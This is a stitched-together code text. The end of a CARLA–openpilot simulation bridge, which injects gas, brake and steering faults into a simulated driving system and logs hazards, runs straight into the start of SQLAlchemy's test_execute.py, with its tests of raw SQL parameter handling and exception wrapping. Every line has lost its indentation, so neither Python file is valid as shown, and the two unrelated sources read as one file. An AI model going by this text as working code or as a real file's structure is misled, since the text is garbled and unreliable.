# vehicle2.set_autopilot(True,8008)
tm.vehicle_percentage_speed_difference(vehicle2,-args.cruise_lead) #Sets the difference between the vehicle's intended speed and its current speed limit.
# tm.distance_to_leading_vehicle(vehicle2,5)
if Other_vehicles_Enable:
tm.vehicle_percentage_speed_difference(vehicle3,-200)
is_autopilot_engaged =False #vehicle2
fp_res = open('results/data_ADS1_{}mph_{}m_{}V0_{}V0.csv'.format(vEgo,args.init_dist,args.cruise_lead,args.cruise_lead2),'w')
fp_res.write("frameIdx,distance(m),speed(m/s),acceleration(m/s2),angle_steer,gas,brake,steer_torque,actuators_steeringAngleDeg,actuators_steer,actuators_accel,d_rel(m),v_rel(m/s),c_path(m),faultinjection,faultType,alert,hazard,hazardType,alertMsg,hazardMsg,laneInvasion,yPos,Laneline1,Laneline2,Laneline3,Laneline4,leftPath,rightPath,leftEdge,rightEdge,vel_pos.x,vel_pos.y,vel2_pos.x,vel2_pos.y,vel4_pos.x,vel4_pos.y\n")
speed = 0
throttle_out_hist = 0
FI_duration = 1000# set to a larger value, like 10 seconds, so it won't be reached in the normal case with human driver engagement #250*10ms =2.5s
Num_laneInvasion = 0
t_laneInvasion = 0
pathleft = pathright = 0
roadEdgeLeft = roadEdgeRight = 0
laneLineleft=-1.85
laneLineright = 1.85
Lead_vehicle_in_vision = False #True when the lead vehicle is captured by the camera
faulttime = -1
alerttime = -1
hazardtime = -1
fault_duration = 0
driver_alerted_time = -1
H2_count = 0
hazMsg = ""
hazard = False
hazType =0x0
alertType_list =[]
alertText1_list = []
alertText2_list = []
FI_flag = 0
FI_Type = 0
frameIdx = 0
FI_H3_combine_enable = 0
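# FI_Type bit flags used by the fault injection branch below:
# 0x01 = max gas, 0x02 = max brake, 0x04 = max left steer, 0x08 = max right steer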
while frameIdx<5000:
altMsg = ""
alert = False
if is_openpilot_engaged:
frameIdx += 1
#simulate button Enable event
if rk.frame == 800:
q.put("cruise_up")
if frameIdx == 1000:
if args.cruise_lead != args.cruise_lead2: #change the speed of vehicle2
print("===========change Lead vehicle cruise speed from {}mph to {}mph".format(args.cruise_lead,args.cruise_lead2))
tm.vehicle_percentage_speed_difference(vehicle2,-args.cruise_lead2)
# if frameIdx >2000:
# q.put("quit")
# 1. Read the throttle, steer and brake from op or manual controls
# 2. Set instructions in Carla
# 3. Send current carstate to op via can
cruise_button = 0
throttle_out = steer_out = brake_out = 0.0
throttle_op = steer_op = brake_op = 0
throttle_manual = steer_manual = brake_manual = 0.0
actuators_steeringAngleDeg = actuators_steer = actuators_accel = 0
dRel = 0
yRel = 2.5
vRel = 0
vLead = 0
yPos = 0
ylaneLines = []
yroadEdges = []
# --------------Step 1-------------------------------
if not q.empty():
message = q.get()
m = message.split('_')
print(message)
if m[0] == "steer":
steer_manual = float(m[1])
is_openpilot_engaged = False
elif m[0] == "throttle":
throttle_manual = float(m[1])
is_openpilot_engaged = False
elif m[0] == "brake":
brake_manual = float(m[1])
is_openpilot_engaged = False
elif m[0] == "reverse":
#in_reverse = not in_reverse
cruise_button = CruiseButtons.CANCEL
is_openpilot_engaged = False
elif m[0] == "cruise":
vehicle2.set_autopilot(True,8008)
if Other_vehicles_Enable:
vehicle3.set_autopilot(True,8008)
vehicle4.set_autopilot(True,8008)
vehicle5.set_autopilot(True,8008)
if m[1] == "down":
cruise_button = CruiseButtons.DECEL_SET
is_openpilot_engaged = True
elif m[1] == "up":
cruise_button = CruiseButtons.RES_ACCEL
is_openpilot_engaged = True
elif m[1] == "cancel":
cruise_button = CruiseButtons.CANCEL
is_openpilot_engaged = False
elif m[0] == "quit":
vehicle2.set_autopilot(False,8008)
break
throttle_out = throttle_manual * throttle_manual_multiplier
steer_out = steer_manual * steer_manual_multiplier
brake_out = brake_manual * brake_manual_multiplier
#steer_out = steer_out
# steer_out = steer_rate_limit(old_steer, steer_out)
old_steer = steer_out
old_throttle = throttle_out
old_brake = brake_out
# print('message',old_throttle, old_steer, old_brake)
if is_openpilot_engaged:
sm.update(0)
# TODO gas and brake is deprecated
throttle_op = clip(sm['carControl'].actuators.accel/4.0, 0.0, 1.0)
brake_op = clip(-sm['carControl'].actuators.accel/4.0, 0.0, 1.0)
steer_op = sm['carControl'].actuators.steeringAngleDeg
actuators = sm['carControl'].actuators
actuators_accel = actuators.accel
actuators_steer = actuators.steer
actuators_steeringAngleDeg = actuators.steeringAngleDeg
throttle_out = throttle_op
steer_out = steer_op
brake_out = brake_op
steer_out = steer_rate_limit(old_steer, steer_out)
old_steer = steer_out
dRel = sm['radarState'].leadOne.dRel
yRel = sm['radarState'].leadOne.yRel #y means lateral direction
vRel = sm['radarState'].leadOne.vRel
vLead = sm['radarState'].leadOne.vLead
if not sm['radarState'].leadOne.status:
Lead_vehicle_in_vision = False
else:
Lead_vehicle_in_vision = True
md = sm['modelV2']
if len(md.position.y)>0:
yPos = round(md.position.y[0],2) # position
ylaneLines = [round(md.laneLines[0].y[0],2),round(md.laneLines[1].y[0],2),round(md.laneLines[2].y[0],2),round(md.laneLines[3].y[0],2)]
yroadEdges = [round(md.roadEdges[0].y[0],2), round(md.roadEdges[1].y[0],2)] #left and right roadedges
# print(ylaneLines[2] - yPos)
if len(ylaneLines)>2:
laneLineleft = ylaneLines[1]
laneLineright = ylaneLines[2]
pathleft = yPos- laneLineleft
pathright = laneLineright-yPos
roadEdgeLeft = yroadEdges[0]
roadEdgeRight = yroadEdges[1]
#controlsState
alertText1 = sm['controlsState'].alertText1
alertText2 = sm['controlsState'].alertText2
alertType = sm['controlsState'].alertType
if alertType and alertType not in alertType_list and alertText1 not in alertText1_list:
alertText1_list.append(alertText1)
alertType_list.append(alertType)
if(alerttime== -1 and 'startupMaster/permanent' not in alertType and 'buttonEnable/enable' not in alertType):
alerttime = frameIdx
alert = True
print("=================Alert============================")
print(alertType,":",alertText1,alertText2)
else:
if throttle_out==0 and old_throttle>0:
if throttle_ease_out_counter>0:
throttle_out = old_throttle
throttle_ease_out_counter += -1
else:
throttle_ease_out_counter = REPEAT_COUNTER
old_throttle = 0
if brake_out==0 and old_brake>0:
if brake_ease_out_counter>0:
brake_out = old_brake
brake_ease_out_counter += -1
else:
brake_ease_out_counter = REPEAT_COUNTER
old_brake = 0
if steer_out==0 and old_steer!=0:
if steer_ease_out_counter>0:
steer_out = old_steer
steer_ease_out_counter += -1
else:
steer_ease_out_counter = REPEAT_COUNTER
old_steer = 0
# --------------Step 2-------------------------------
steer_carla = steer_out / (max_steer_angle * STEER_RATIO * -1)
steer_carla = np.clip(steer_carla, -1,1)
steer_out = steer_carla * (max_steer_angle * STEER_RATIO * -1)
old_steer = steer_carla * (max_steer_angle * STEER_RATIO * -1)
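# steer_out is a wheel angle in degrees; dividing by max_steer_angle *
# STEER_RATIO (with a sign flip for CARLA's steering convention) normalizes
# it into CARLA's [-1, 1] steer command, and the clipped value is converted
# back so old_steer stays consistent with what is actually applied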
if speed:
headway_time = dRel/speed
else:
headway_time = 100
RSpeed = -vRel #v_Ego -V_Lead
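# e.g. dRel = 30 m at speed = 15 m/s gives a 2.0 s headway, the threshold
# used by the commented-out FI trigger examples below; RSpeed > 0 means the
# ego vehicle is closing on the lead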
if FI_Enable == True:
if Mode_FI_duration>0: #
if FI_flag>0: #reset FI
FI_flag = 0
FI_Type = 0
#*********************************************#
#condition to activate fault injection
#throttle:HOOK#
# manual FI examples
# if headway_time<=2.0 and RSpeed>=0 and vLead!=0:
# FI_Type |= 0x01
# FI_flag = 1
# FI_duration = 100
# FI_H3_combine_enable = 1
# if frameIdx>1000 and (headway_time>2.0 and RSpeed<0 and Lead_vehicle_in_vision or Lead_vehicle_in_vision==False):
# FI_Type |= 0x02
# FI_flag=1
if FI_H3_combine_enable:
if speed>15 and laneLineleft>-1.25:
FI_Type |= 0x04
FI_flag=1
if speed>15 and laneLineleft<1.25:
FI_Type |= 0x08 #0b1000
FI_flag=1
#*********************************************#
#condition to stop fault injection and start human driver engagement if FI
if Driver_react_Enable == True:
if driver_alerted_time >= 0 and frameIdx >=250 + driver_alerted_time: #average reaction time 2.5s
#stop fault injection
FI_flag = -1
#human driver reaction # full brake
if FI_Type&0x01: # max gas
throttle_out = 0
brake_out = 1
steer_carla = 0
#execute fault injection
if FI_flag > 0:
if fault_duration < FI_duration: #time budget
if faulttime == -1:
faulttime = frameIdx
fault_duration += 1
if FI_Type&0x01: # max gas
throttle_out=0.6
brake_out=0
if FI_Type&0x02: #max brake
throttle_out=0
brake_out = 1
if FI_Type&0x04: #max left steer
steer_carla = vc.steer - 0.5/(max_steer_angle * STEER_RATIO ) #maximum change 0.5 degree at each step
steer_carla = np.clip(steer_carla, -1,1)
if FI_Type&0x08: #max right steer
steer_carla = vc.steer + 0.5/(max_steer_angle * STEER_RATIO ) #maximum change 0.5 degree at each step
steer_carla = np.clip(steer_carla, -1,1)
else:
FI_flag = 0
vc.throttle = throttle_out/0.6
vc.steer = steer_carla
vc.brake = brake_out
vehicle.apply_control(vc)
# vehicle2.apply_control(vc)
# measurements, sensor_data = client.read_data()
# control = measurements.player_measurements.autopilot_control
# client.send_control(control)
# --------------Step 3-------------------------------
vel = vehicle.get_velocity()
speed = math.sqrt(vel.x**2 + vel.y**2 + vel.z**2) # in m/s
acc = vehicle.get_acceleration()
acceleration = math.sqrt(acc.x**2 + acc.y**2 + acc.z**2) # in m/s^2
if speed==acceleration==0:
acceleration =1
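# (the acceleration fallback above avoids a divide-by-zero in the
# throttle_out_hist/acceleration term of the console log below)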
vehicle_state.speed = speed
vehicle_state.vel = vel
vehicle_state.angle = steer_out
vehicle_state.cruise_button = cruise_button
vehicle_state.is_engaged = is_openpilot_engaged
vel_pos = vehicle.get_transform().location
vel2_pos = vehicle2.get_transform().location
vel4_pos = vel2_pos
if Other_vehicles_Enable:
vel4_pos = vehicle4.get_transform().location
#-----------------------------------------------------
if frameIdx == 1000:
if speed <0.02 and throttle_out <0.02 and brake_out <0.02: #fail to start
reInitialize_bridge = True
print("reInitialize bridge.py...\n")
break
#------------------------------------------------------
if driver_alerted_time == -1 and fault_duration>0 and (alert or throttle_out>= 0.6 or speed>1.1*vEgo or brake_out>0.95): #max gas//max brake//exceed speed limit
driver_alerted_time =frameIdx #driver is alerted
#Accident: collision
if len(collision_hist):
print(collision_hist[0],collision_hist[0].other_actor)
# print(vehicle2)
if collision_hist[0].other_actor.id == vehicle2.id: #collide with vehicle2:
dRel = -0.1
if "lead" not in hazMsg:
hazMsg +="||collide with lead vihecle||"
else:
if "curb" not in hazMsg:
hazMsg +="||collide with curb||"
if hazType&0x04 == 0:
hazard = True
hazardtime =frameIdx
hazMsg +="H3"
hazType |= 0x04 #0b 100
#if laneInvasion
laneInvasion_Flag = False
if len(laneInvasion_hist)>Num_laneInvasion:
# hazard = True
laneInvasion_Flag =True
Num_laneInvasion = len(laneInvasion_hist)
t_laneInvasion = frameIdx
print(Num_laneInvasion,laneInvasion_hist[-1],laneInvasion_hist[-1].crossed_lane_markings)
# del(laneInvasion_hist[0])
#label hazard
if dRel <0.5 and Lead_vehicle_in_vision and 'curb' not in hazMsg: # unsafe distance # collide with curb is not H1
if hazType&0x01 == 0:
hazard = True
hazardtime =frameIdx
hazMsg +="H1"
hazType |= 0x01 #0b 001
if speed<0.02 and (dRel >50 or Lead_vehicle_in_vision==False) and fault_duration>0: #decrease the speed to full stop without a lead vehicle
if hazType&0x02 == 0:
H2_count += 1
if H2_count>100: #last for 1 second
hazard = True
hazardtime =frameIdx
hazMsg +="H2"
hazType |= 0x02 #0b 100
else:
H2_count = 0
if Num_laneInvasion > 0 and (roadEdgeRight <3.7 and (pathright <1.15) or roadEdgeRight>7.4): #lane width = 3.7 m, vehicle width = 2.3 m; or (ylaneLines[3] - ylaneLines[2] < 1.15)
if hazType&0x04 == 0:
hazard = True
hazardtime =frameIdx
hazMsg +="H3"
hazType |= 0x04 #0b 100
#result print out
# if rk.frame%PRINT_DECIMATION == 0:
if rk.frame%PRINT_DECIMATION == 0 or dRel<1 and Lead_vehicle_in_vision:
print("Frame ID:",frameIdx,"frame: ", rk.frame,"engaged:", is_openpilot_engaged, "; throttle: ", round(vc.throttle, 3), "acc:" ,round(acceleration,2),round(throttle_out_hist/acceleration,2),"; steer(c/deg): ", round(vc.steer, 3), round(steer_out, 3), "; brake: ", round(vc.brake, 3),\
"speed:",round(speed,2),'vLead:',round(vLead,2),"vRel",round(-vRel,2),"drel:",round(dRel,2),round(yRel,2),'Lanelines',yPos,ylaneLines,yroadEdges,"FI:",FI_flag,"Hazard:",hazard)
#result record in files
if is_openpilot_engaged :#and (frameIdx%20==0 or (dRel<1 and Lead_vehicle_in_vision)): #record every 20*10=0.2s
fp_res.write("{},{},{},{},{},{},{},{},{},{},{},{},{},{},{},{},{},{},{},{},{},{},{},{},{},{},{},{},{},{},{},{},{},{}\n".format(frameIdx,0,speed,acceleration,steer_out,vc.throttle,vc.brake,vc.steer,actuators_steeringAngleDeg,actuators_steer,actuators_accel, dRel,-vRel,yRel,FI_flag>0,FI_Type if FI_flag else 0 ,alert,hazard,hazType,altMsg,hazMsg, laneInvasion_Flag,yPos,ylaneLines,pathleft,pathright,roadEdgeLeft,roadEdgeRight,vel_pos.x,vel_pos.y,vel2_pos.x,vel2_pos.y,vel4_pos.x,vel4_pos.y))
rk.keep_time()
throttle_out_hist = vc.throttle
#brake with hazard
if hazard:# or FI_flag ==-1 and speed<0.01:
if 'collide' in hazMsg or frameIdx - hazardtime >250: #terminate the simulation right after any collision or wait 2 seconds after any hazard
break
#store alert,hazard message to a file, which will be stored in a summary file
Alert_flag = len(alertType_list)>0 and 'startupMaster/permanent' not in alertType_list and 'buttonEnable/enable' not in alertType_list
fp_temp = open("temp.txt",'w')
fp_temp.write("{},{},{},{},{},{},{},{},{}".format("||".join(alertType_list),hazMsg,faulttime,alerttime,hazardtime, Alert_flag,hazard,fault_duration,Num_laneInvasion ))
fp_temp.close()
# Clean up resources in the opposite order they were created.
exit_event.set()
for t in reversed(threads):
t.join()
# t.stop()
gps.destroy()
imu.destroy()
camera.destroy()
vehicle.destroy()
colsensor.destroy()
vehicle2.set_autopilot(False,8008)
vehicle2.destroy()
if Other_vehicles_Enable:
vehicle3.set_autopilot(False,8008)
vehicle3.destroy()
vehicle4.set_autopilot(False,8008)
vehicle4.destroy()
vehicle5.set_autopilot(False,8008)
vehicle5.destroy()
fp_res.close()
# os.killpg(os.getpgid(os.getpid()), signal.SIGINT) #kill the remaining threads
sys.exit(0)
# exit()
def bridge_keep_alive(q: Any):
while 1:
try:
bridge(q)
break
except RuntimeError:
print("Restarting bridge...")
if __name__ == "__main__":
# print(os.getcwd())
# os.system('rm ./results/*')
# make sure params are in a good state
set_params_enabled()
msg = messaging.new_message('liveCalibration')
msg.liveCalibration.validBlocks = 20
msg.liveCalibration.rpyCalib = [0.0, 0.0, 0.0]
Params().put("CalibrationParams", msg.to_bytes())
q: Any = Queue()
#=================================================
# p = Process(target=bridge_keep_alive, args=(q,), daemon=True)
# p.start()
# if 0:#args.joystick:
# # start input poll for joystick
# from lib.manual_ctrl import wheel_poll_thread
# wheel_poll_thread(q)
# p.join()
# else:
# # start input poll for keyboard
# from lib.keyboard_ctrl import keyboard_poll_thread
# keyboard_poll_thread(q)
##===========================================
# # start input poll for keyboard
# from lib.keyboard_ctrl import keyboard_poll_thread
# p_keyboard = Process(target=keyboard_poll_thread, args=(q,), daemon=True)
# p_keyboard.start()
bridge_keep_alive(q)
# if reInitialize_bridge: #if initialization fails, do it again
# q: Any = Queue()
# bridge_keep_alive(q)
# p_keyboard.join()
|
test_execute.py
|
# coding: utf-8
import collections.abc as collections_abc
from contextlib import contextmanager
from contextlib import nullcontext
import copy
from io import StringIO
import re
import threading
from unittest import mock
from unittest.mock import call
from unittest.mock import Mock
from unittest.mock import patch
import weakref
import sqlalchemy as tsa
from sqlalchemy import bindparam
from sqlalchemy import create_engine
from sqlalchemy import create_mock_engine
from sqlalchemy import event
from sqlalchemy import func
from sqlalchemy import inspect
from sqlalchemy import INT
from sqlalchemy import Integer
from sqlalchemy import LargeBinary
from sqlalchemy import MetaData
from sqlalchemy import select
from sqlalchemy import Sequence
from sqlalchemy import String
from sqlalchemy import testing
from sqlalchemy import text
from sqlalchemy import TypeDecorator
from sqlalchemy import util
from sqlalchemy import VARCHAR
from sqlalchemy.engine import BindTyping
from sqlalchemy.engine import default
from sqlalchemy.engine.base import Connection
from sqlalchemy.engine.base import Engine
from sqlalchemy.pool import NullPool
from sqlalchemy.pool import QueuePool
from sqlalchemy.sql import column
from sqlalchemy.sql import literal
from sqlalchemy.sql.elements import literal_column
from sqlalchemy.testing import assert_raises
from sqlalchemy.testing import assert_raises_message
from sqlalchemy.testing import config
from sqlalchemy.testing import engines
from sqlalchemy.testing import eq_
from sqlalchemy.testing import expect_raises_message
from sqlalchemy.testing import fixtures
from sqlalchemy.testing import is_
from sqlalchemy.testing import is_false
from sqlalchemy.testing import is_not
from sqlalchemy.testing import is_true
from sqlalchemy.testing import mock
from sqlalchemy.testing.assertions import expect_deprecated
from sqlalchemy.testing.assertsql import CompiledSQL
from sqlalchemy.testing.schema import Column
from sqlalchemy.testing.schema import Table
from sqlalchemy.testing.util import gc_collect
from sqlalchemy.testing.util import picklers
class SomeException(Exception):
pass
class Foo:
def __str__(self):
return "foo"
def __unicode__(self):
return "fóó"
class ExecuteTest(fixtures.TablesTest):
__backend__ = True
@classmethod
def define_tables(cls, metadata):
Table(
"users",
metadata,
Column("user_id", INT, primary_key=True, autoincrement=False),
Column("user_name", VARCHAR(20)),
)
Table(
"users_autoinc",
metadata,
Column(
"user_id", INT, primary_key=True, test_needs_autoincrement=True
),
Column("user_name", VARCHAR(20)),
)
def test_no_params_option(self):
stmt = (
"SELECT '%'"
+ testing.db.dialect.statement_compiler(
testing.db.dialect, None
).default_from()
)
with testing.db.connect() as conn:
result = (
conn.execution_options(no_parameters=True)
.exec_driver_sql(stmt)
.scalar()
)
eq_(result, "%")
def test_no_strings(self, connection):
with expect_raises_message(
tsa.exc.ObjectNotExecutableError,
"Not an executable object: 'select 1'",
):
connection.execute("select 1")
def test_raw_positional_invalid(self, connection):
assert_raises_message(
tsa.exc.ArgumentError,
"List argument must consist only of tuples or dictionaries",
connection.exec_driver_sql,
"insert into users (user_id, user_name) values (?, ?)",
[2, "fred"],
)
assert_raises_message(
tsa.exc.ArgumentError,
"List argument must consist only of tuples or dictionaries",
connection.exec_driver_sql,
"insert into users (user_id, user_name) values (?, ?)",
[[3, "ed"], [4, "horse"]],
)
def test_raw_named_invalid(self, connection):
        # this is awkward b.c. it is really just testing that plain
        # Python raises TypeError when arguments are passed that look
        # like the legacy calling style, which also happens to conflict
        # with the positional signature of the method. some combinations
        # can get through and fail differently
assert_raises(
TypeError,
connection.exec_driver_sql,
"insert into users (user_id, user_name) "
"values (%(id)s, %(name)s)",
{"id": 2, "name": "ed"},
{"id": 3, "name": "horse"},
{"id": 4, "name": "horse"},
)
assert_raises(
TypeError,
connection.exec_driver_sql,
"insert into users (user_id, user_name) "
"values (%(id)s, %(name)s)",
id=4,
name="sally",
)
@testing.requires.qmark_paramstyle
def test_raw_qmark(self, connection):
conn = connection
conn.exec_driver_sql(
"insert into users (user_id, user_name) values (?, ?)",
(1, "jack"),
)
conn.exec_driver_sql(
"insert into users (user_id, user_name) values (?, ?)",
(2, "fred"),
)
conn.exec_driver_sql(
"insert into users (user_id, user_name) values (?, ?)",
[(3, "ed"), (4, "horse")],
)
conn.exec_driver_sql(
"insert into users (user_id, user_name) values (?, ?)",
[(5, "barney"), (6, "donkey")],
)
conn.exec_driver_sql(
"insert into users (user_id, user_name) values (?, ?)",
(7, "sally"),
)
res = conn.exec_driver_sql("select * from users order by user_id")
assert res.fetchall() == [
(1, "jack"),
(2, "fred"),
(3, "ed"),
(4, "horse"),
(5, "barney"),
(6, "donkey"),
(7, "sally"),
]
res = conn.exec_driver_sql(
"select * from users where user_name=?", ("jack",)
)
assert res.fetchall() == [(1, "jack")]
@testing.requires.format_paramstyle
def test_raw_sprintf(self, connection):
conn = connection
conn.exec_driver_sql(
"insert into users (user_id, user_name) values (%s, %s)",
(1, "jack"),
)
conn.exec_driver_sql(
"insert into users (user_id, user_name) values (%s, %s)",
[(2, "ed"), (3, "horse")],
)
conn.exec_driver_sql(
"insert into users (user_id, user_name) values (%s, %s)",
(4, "sally"),
)
conn.exec_driver_sql("insert into users (user_id) values (%s)", (5,))
res = conn.exec_driver_sql("select * from users order by user_id")
assert res.fetchall() == [
(1, "jack"),
(2, "ed"),
(3, "horse"),
(4, "sally"),
(5, None),
]
res = conn.exec_driver_sql(
"select * from users where user_name=%s", ("jack",)
)
assert res.fetchall() == [(1, "jack")]
@testing.requires.pyformat_paramstyle
def test_raw_python(self, connection):
conn = connection
conn.exec_driver_sql(
"insert into users (user_id, user_name) "
"values (%(id)s, %(name)s)",
{"id": 1, "name": "jack"},
)
conn.exec_driver_sql(
"insert into users (user_id, user_name) "
"values (%(id)s, %(name)s)",
[{"id": 2, "name": "ed"}, {"id": 3, "name": "horse"}],
)
conn.exec_driver_sql(
"insert into users (user_id, user_name) "
"values (%(id)s, %(name)s)",
dict(id=4, name="sally"),
)
res = conn.exec_driver_sql("select * from users order by user_id")
assert res.fetchall() == [
(1, "jack"),
(2, "ed"),
(3, "horse"),
(4, "sally"),
]
@testing.requires.named_paramstyle
def test_raw_named(self, connection):
conn = connection
conn.exec_driver_sql(
"insert into users (user_id, user_name) values (:id, :name)",
{"id": 1, "name": "jack"},
)
conn.exec_driver_sql(
"insert into users (user_id, user_name) values (:id, :name)",
[{"id": 2, "name": "ed"}, {"id": 3, "name": "horse"}],
)
conn.exec_driver_sql(
"insert into users (user_id, user_name) values (:id, :name)",
{"id": 4, "name": "sally"},
)
res = conn.exec_driver_sql("select * from users order by user_id")
assert res.fetchall() == [
(1, "jack"),
(2, "ed"),
(3, "horse"),
(4, "sally"),
]
def test_raw_tuple_params(self, connection):
"""test #7820
There was an apparent improvement in the distill params
methodology used in exec_driver_sql which allows raw tuples to
pass through. In 1.4 there seems to be a _distill_cursor_params()
function that says it can handle this kind of parameter, but it isn't
used and when I tried to substitute it in for exec_driver_sql(),
things still fail.
In any case, add coverage here for the use case of passing
direct tuple params to exec_driver_sql including as the first
param, to note that it isn't mis-interpreted the way it is
in 1.x.
"""
with patch.object(connection.dialect, "do_execute") as do_exec:
connection.exec_driver_sql(
"UPDATE users SET user_name = 'query_one' WHERE "
"user_id = %s OR user_id IN %s",
(3, (1, 2)),
)
connection.exec_driver_sql(
"UPDATE users SET user_name = 'query_two' WHERE "
"user_id IN %s OR user_id = %s",
((1, 2), 3),
)
eq_(
do_exec.mock_calls,
[
call(
mock.ANY,
"UPDATE users SET user_name = 'query_one' "
"WHERE user_id = %s OR user_id IN %s",
connection.dialect.execute_sequence_format((3, (1, 2))),
mock.ANY,
),
call(
mock.ANY,
"UPDATE users SET user_name = 'query_two' "
"WHERE user_id IN %s OR user_id = %s",
connection.dialect.execute_sequence_format(((1, 2), 3)),
mock.ANY,
),
],
)
def test_non_dict_mapping(self, connection):
"""ensure arbitrary Mapping works for execute()"""
class NotADict(collections_abc.Mapping):
def __init__(self, _data):
self._data = _data
def __iter__(self):
return iter(self._data)
def __len__(self):
return len(self._data)
def __getitem__(self, key):
return self._data[key]
def keys(self):
return self._data.keys()
nd = NotADict({"a": 10, "b": 15})
eq_(dict(nd), {"a": 10, "b": 15})
result = connection.execute(
select(
bindparam("a", type_=Integer), bindparam("b", type_=Integer)
),
nd,
)
eq_(result.first(), (10, 15))
def test_row_works_as_mapping(self, connection):
"""ensure the RowMapping object works as a parameter dictionary for
execute."""
result = connection.execute(
select(literal(10).label("a"), literal(15).label("b"))
)
row = result.first()
eq_(row, (10, 15))
eq_(row._mapping, {"a": 10, "b": 15})
result = connection.execute(
select(
bindparam("a", type_=Integer).label("a"),
bindparam("b", type_=Integer).label("b"),
),
row._mapping,
)
row = result.first()
eq_(row, (10, 15))
eq_(row._mapping, {"a": 10, "b": 15})
def test_dialect_has_table_assertion(self):
with expect_raises_message(
tsa.exc.ArgumentError,
r"The argument passed to Dialect.has_table\(\) should be a",
):
testing.db.dialect.has_table(testing.db, "some_table")
def test_exception_wrapping_dbapi(self):
with testing.db.connect() as conn:
# engine does not have exec_driver_sql
assert_raises_message(
tsa.exc.DBAPIError,
r"not_a_valid_statement",
conn.exec_driver_sql,
"not_a_valid_statement",
)
@testing.requires.sqlite
def test_exception_wrapping_non_dbapi_error(self):
e = create_engine("sqlite://")
e.dialect.is_disconnect = is_disconnect = Mock()
with e.connect() as c:
c.connection.cursor = Mock(
return_value=Mock(
execute=Mock(
side_effect=TypeError("I'm not a DBAPI error")
)
)
)
assert_raises_message(
TypeError,
"I'm not a DBAPI error",
c.exec_driver_sql,
"select ",
)
eq_(is_disconnect.call_count, 0)
def test_exception_wrapping_non_standard_dbapi_error(self):
class DBAPIError(Exception):
pass
class OperationalError(DBAPIError):
pass
class NonStandardException(OperationalError):
pass
# TODO: this test is assuming too much of arbitrary dialects and would
# be better suited tested against a single mock dialect that does not
# have any special behaviors
with patch.object(
testing.db.dialect, "dbapi", Mock(Error=DBAPIError)
), patch.object(
testing.db.dialect, "loaded_dbapi", Mock(Error=DBAPIError)
), patch.object(
testing.db.dialect, "is_disconnect", lambda *arg: False
), patch.object(
testing.db.dialect,
"do_execute",
Mock(side_effect=NonStandardException),
), patch.object(
testing.db.dialect.execution_ctx_cls,
"handle_dbapi_exception",
Mock(),
):
with testing.db.connect() as conn:
assert_raises(
tsa.exc.OperationalError, conn.exec_driver_sql, "select 1"
)
def test_exception_wrapping_non_dbapi_statement(self):
class MyType(TypeDecorator):
impl = Integer
cache_ok = True
def process_bind_param(self, value, dialect):
raise SomeException("nope")
def _go(conn):
assert_raises_message(
tsa.exc.StatementError,
r"\(.*.SomeException\) " r"nope\n\[SQL\: u?SELECT 1 ",
conn.execute,
select(1).where(column("foo") == literal("bar", MyType())),
)
with testing.db.connect() as conn:
_go(conn)
def test_not_an_executable(self):
for obj in (
Table("foo", MetaData(), Column("x", Integer)),
Column("x", Integer),
tsa.and_(True),
tsa.and_(True).compile(),
column("foo"),
column("foo").compile(),
select(1).cte(),
# select(1).subquery(),
MetaData(),
Integer(),
tsa.Index(name="foo"),
tsa.UniqueConstraint("x"),
):
with testing.db.connect() as conn:
assert_raises_message(
tsa.exc.ObjectNotExecutableError,
"Not an executable object",
conn.execute,
obj,
)
def test_subquery_exec_warning(self):
for obj in (select(1).alias(), select(1).subquery()):
with testing.db.connect() as conn:
with expect_deprecated(
"Executing a subquery object is deprecated and will "
"raise ObjectNotExecutableError"
):
eq_(conn.execute(obj).scalar(), 1)
def test_stmt_exception_bytestring_raised(self):
name = "méil"
users = self.tables.users
with testing.db.connect() as conn:
assert_raises_message(
tsa.exc.StatementError,
"A value is required for bind parameter 'uname'\n"
".*SELECT users.user_name AS .méil.",
conn.execute,
select(users.c.user_name.label(name)).where(
users.c.user_name == bindparam("uname")
),
{"uname_incorrect": "foo"},
)
def test_stmt_exception_bytestring_utf8(self):
# uncommon case for Py3K, bytestring object passed
# as the error message
message = "some message méil".encode("utf-8")
err = tsa.exc.SQLAlchemyError(message)
eq_(str(err), "some message méil")
def test_stmt_exception_bytestring_latin1(self):
# uncommon case for Py3K, bytestring object passed
# as the error message
message = "some message méil".encode("latin-1")
err = tsa.exc.SQLAlchemyError(message)
eq_(str(err), "some message m\\xe9il")
def test_stmt_exception_unicode_hook_unicode(self):
# uncommon case for Py2K, Unicode object passed
# as the error message
message = "some message méil"
err = tsa.exc.SQLAlchemyError(message)
eq_(str(err), "some message méil")
def test_stmt_exception_object_arg(self):
err = tsa.exc.SQLAlchemyError(Foo())
eq_(str(err), "foo")
def test_stmt_exception_str_multi_args(self):
err = tsa.exc.SQLAlchemyError("some message", 206)
eq_(str(err), "('some message', 206)")
def test_stmt_exception_str_multi_args_bytestring(self):
message = "some message méil".encode("utf-8")
err = tsa.exc.SQLAlchemyError(message, 206)
eq_(str(err), str((message, 206)))
def test_stmt_exception_str_multi_args_unicode(self):
message = "some message méil"
err = tsa.exc.SQLAlchemyError(message, 206)
eq_(str(err), str((message, 206)))
def test_stmt_exception_pickleable_no_dbapi(self):
self._test_stmt_exception_pickleable(Exception("hello world"))
@testing.crashes(
"postgresql+psycopg2",
"Older versions don't support cursor pickling, newer ones do",
)
@testing.fails_on(
"mysql+mysqlconnector",
"Exception doesn't come back exactly the same from pickle",
)
@testing.fails_on(
"oracle+cx_oracle",
"cx_oracle exception seems to be having some issue with pickling",
)
def test_stmt_exception_pickleable_plus_dbapi(self):
raw = testing.db.raw_connection()
the_orig = None
try:
try:
cursor = raw.cursor()
cursor.execute("SELECTINCORRECT")
except testing.db.dialect.dbapi.Error as orig:
# py3k has "orig" in local scope...
the_orig = orig
finally:
raw.close()
self._test_stmt_exception_pickleable(the_orig)
def _test_stmt_exception_pickleable(self, orig):
for sa_exc in (
tsa.exc.StatementError(
"some error",
"select * from table",
{"foo": "bar"},
orig,
False,
),
tsa.exc.InterfaceError(
"select * from table", {"foo": "bar"}, orig, True
),
tsa.exc.NoReferencedTableError("message", "tname"),
tsa.exc.NoReferencedColumnError("message", "tname", "cname"),
tsa.exc.CircularDependencyError(
"some message", [1, 2, 3], [(1, 2), (3, 4)]
),
):
for loads, dumps in picklers():
repickled = loads(dumps(sa_exc))
eq_(repickled.args[0], sa_exc.args[0])
if isinstance(sa_exc, tsa.exc.StatementError):
eq_(repickled.params, {"foo": "bar"})
eq_(repickled.statement, sa_exc.statement)
if hasattr(sa_exc, "connection_invalidated"):
eq_(
repickled.connection_invalidated,
sa_exc.connection_invalidated,
)
eq_(repickled.orig.args[0], orig.args[0])
